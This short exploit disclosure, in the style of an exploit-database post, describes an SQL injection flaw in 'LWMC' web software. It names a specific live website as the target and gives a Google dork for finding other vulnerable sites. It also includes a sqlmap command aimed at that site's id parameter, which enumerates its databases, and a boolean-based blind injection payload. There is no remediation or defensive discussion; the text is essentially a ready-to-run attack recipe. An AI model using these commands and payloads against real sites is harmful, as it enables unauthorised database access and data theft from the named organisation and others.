**************************** #Exploit Title: LWMC - SQL Injection vulnerability #Date: 2020-12-29 #Exploit Author: darksecurity team #Vendor Homepage: https://www.lwmc.com.pk #Google Dork: "Powered by Lwmc" #Tested On: windows 10 sqlmap: sqlmap -u "https://www.lwmc.com.pk/read_more.php?id=37" --dbs Testing Method; - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=37' AND 7188=7188 AND 'LHNq'='LHNq ************************************************** #Discovered by: mjoker-mina_ah-mohammad_zo-reza_zo **************************************************